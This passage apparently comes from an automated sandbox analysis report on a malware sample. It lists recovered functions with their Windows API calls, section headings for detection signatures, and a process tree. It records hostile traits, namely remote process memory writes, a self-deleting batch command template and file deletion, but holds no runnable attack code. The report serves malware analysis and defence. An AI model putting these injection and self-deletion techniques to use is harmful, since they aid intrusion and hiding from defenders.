Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

CloseHandle.KERNEL32(?), ref: 0015505E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 00156F09
bind.WS2_32 ref: 00156F25
closesocket.WS2_32 ref: 00156F30

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014F825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 00172976
closesocket.WS2_32(?), ref: 0017297F
WSACloseEvent.WS2_32(?), ref: 00172992

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015E22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 0015E22E
PathRemoveExtensionW.SHLWAPI(?), ref: 0015E242
CharUpperW.USER32(?,?,?,0015E32B), ref: 0015E24C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

Part of subcall function 0015692C: EnterCriticalSection.KERNEL32(00183510,00000024,0015699F,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 0015693C
Part of subcall function 0015692C: LeaveCriticalSection.KERNEL32(00183510,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 00156966

HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00167011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(00182FD8), ref: 0016702B
GetNativeSystemInfo.KERNEL32(?), ref: 00167167
memset.MSVCRT ref: 0016719C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015E4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0015E4E9

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Part of subcall function 0015E22A: PathFindFileNameW.SHLWAPI(?), ref: 0015E22E
Part of subcall function 0015E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 0015E242
Part of subcall function 0015E22A: CharUpperW.USER32(?,?,?,0015E32B), ref: 0015E24C

Part of subcall function 0016100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 0016103A

Sleep.KERNEL32(000001F4), ref: 0015E57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0015E50A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00149A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 001499B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 001499CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00149ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00149AEF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00164159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00164188

Part of subcall function 00156A7D: memcpy.MSVCRT ref: 00156A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 001641C7

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 001641EE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00165594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 0017537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 001753E5
Part of subcall function 0017537E: memset.MSVCRT ref: 001753FB

GetSystemTime.KERNEL32(?), ref: 001655BA

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

Sleep.KERNEL32(000005DC), ref: 001655D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 001655DC

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016589C, Relevance: 5.5, APIs: 3, Instructions: 50

APIs

EnterCriticalSection.KERNEL32(00183510,?,00000001,?,?,00165AB4,?,?,?,00000001), ref: 001658B8
LeaveCriticalSection.KERNEL32(00183510,?,?,00165AB4,?,?,?,00000001), ref: 001658DF

Part of subcall function 0016575A: memset.MSVCRT ref: 00165774
Part of subcall function 0016575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 001657BA

Part of subcall function 00149A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00149ACA
Part of subcall function 00149A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00149AEF

Part of subcall function 00149B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00149B41

_ultow.MSVCRT ref: 00165926

Part of subcall function 00149A2A: CryptDestroyHash.ADVAPI32 ref: 00149A42
Part of subcall function 00149A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00149A53

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00151ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00151AED
CloseHandle.KERNEL32 ref: 00151AFA

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00158162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(00C027EC,00158636,?,?,?,?,00C027E0,?), ref: 0015816B
TlsGetValue.KERNEL32(?,00000001,00C027EC), ref: 0015817D
TlsSetValue.KERNEL32(?,?), ref: 001581C2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015DCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0015DD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 0015DD24
CloseHandle.KERNEL32 ref: 0015DD37

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00173CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00173D14
lstrcmpA.KERNEL32(Basic ,?,001601C0,00000006,Authorization,?,?,?), ref: 00173D1E

Strings

Basic , xrefs: 00173D13 00173D1D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 00155639
TlsAlloc.KERNEL32(?,?,?,?,?,?,00151992,?,?,?,?,001648EB,?,?,00000000), ref: 00155642
InitializeCriticalSection.KERNEL32(001827DC), ref: 00155652

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015DCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 0015DCC4
CloseHandle.KERNEL32 ref: 0015DCD7
CloseHandle.KERNEL32 ref: 0015DCED

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0017042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(001830F4), ref: 00170437
QueryPerformanceCounter.KERNEL32(?), ref: 00170441
GetTickCount.KERNEL32 ref: 0017044B

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00173C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00173C98
StrCmpIW.SHLWAPI(?,?), ref: 00173CA2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001569B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 0015692C: EnterCriticalSection.KERNEL32(00183510,00000024,0015699F,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 0015693C
Part of subcall function 0015692C: LeaveCriticalSection.KERNEL32(00183510,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 00156966

HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00162866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

memcpy.MSVCRT ref: 001629C9
memcpy.MSVCRT ref: 001629DC
memcpy.MSVCRT ref: 001629FD

Part of subcall function 001665F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 0016675C

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

memcpy.MSVCRT ref: 00162A6F

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00156A7D: memcpy.MSVCRT ref: 00156A9C

Part of subcall function 001623E2: memmove.MSVCRT ref: 00162653
Part of subcall function 001623E2: memcpy.MSVCRT ref: 00162662

Part of subcall function 001626D6: memcpy.MSVCRT ref: 0016274B
Part of subcall function 001626D6: memmove.MSVCRT ref: 00162811
Part of subcall function 001626D6: memcpy.MSVCRT ref: 00162820

Part of subcall function 0015E61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 0015E688

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001569C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?), ref: 00156A06

Part of subcall function 0015692C: EnterCriticalSection.KERNEL32(00183510,00000024,0015699F,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 0015693C
Part of subcall function 0015692C: LeaveCriticalSection.KERNEL32(00183510,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 00156966

HeapAlloc.KERNEL32(00000000,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?,?,?), ref: 001569F3

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0017046D, Relevance: 5.1, APIs: 2, Instructions: 14

APIs

Part of subcall function 001702BE: EnterCriticalSection.KERNEL32(00183510,?,00170474,?,?,0014E3BD,00000000,?,?,00000001), ref: 001702CE
Part of subcall function 001702BE: LeaveCriticalSection.KERNEL32(00183510,?,?,0014E3BD,00000000,?,?,00000001), ref: 001702F8

EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014E826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
DeleteFileW.KERNEL32(?), ref: 0014E836

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00152FB7, Relevance: 5.1, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 00152FBB
CloseHandle.KERNEL32 ref: 00152FC2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014D7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 0014D810
EnterCriticalSection.KERNEL32 ref: 0014D82D
memcpy.MSVCRT ref: 0014D878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 0014D892

Part of subcall function 0014D6C8: EnterCriticalSection.KERNEL32(?,?,?,?,0014D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 0014D6D2
Part of subcall function 0014D6C8: memcpy.MSVCRT ref: 0014D74E
Part of subcall function 0014D6C8: memcpy.MSVCRT ref: 0014D762
Part of subcall function 0014D6C8: memcpy.MSVCRT ref: 0014D78C
Part of subcall function 0014D6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,0014D979,00000001,?,00000000,?,?,?,00000000), ref: 0014D7B2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Loading ...

Warning!

Error!

General Information

Detection

Signature Overview

Key, Mouse, Clipboard, Microphone and Screen Caputering:

E-Banking Fraud:

Networking:

Boot Survival:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Virtual Machine Detection:

Hooking and other Techniques for Stealthness and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Screenshot

Startup

Created / dropped Files

Contacted Domains

Contacted IPs

Static File Info

Static PE Info

Network Behavior

Code Manipulation Behavior

System Behavior

Analysis Process: 9f68ae8267182bf1be4e5bb6c75022b8.exe PID: 1476 Parent PID: 1120

Analysis Process: dfengh.exe PID: 1700 Parent PID: 1476

Analysis Process: bfsrfgs.exe PID: 1632 Parent PID: 1700

Analysis Process: yxufa.exe PID: 908 Parent PID: 1632

Analysis Process: explorer.exe PID: 1548 Parent PID: 908

Analysis Process: ctfmon.exe PID: 1732 Parent PID: 908

Analysis Process: wscntfy.exe PID: 1640 Parent PID: 908

Analysis Process: cmd.exe PID: 116 Parent PID: 1632

Disassembly

Code Analysis

Analysis Process: 9f68ae8267182bf1be4e5bb6c75022b8.exe PID: 1476 Parent PID: 1120

Analysis Process: dfengh.exe PID: 1700 Parent PID: 1476

Analysis Process: bfsrfgs.exe PID: 1632 Parent PID: 1700

Analysis Process: yxufa.exe PID: 908 Parent PID: 1632

Analysis Process: explorer.exe PID: 1548 Parent PID: 908

Analysis Process: ctfmon.exe PID: 1732 Parent PID: 908

Analysis Process: wscntfy.exe PID: 1640 Parent PID: 908

Analysis Process: cmd.exe PID: 116 Parent PID: 1632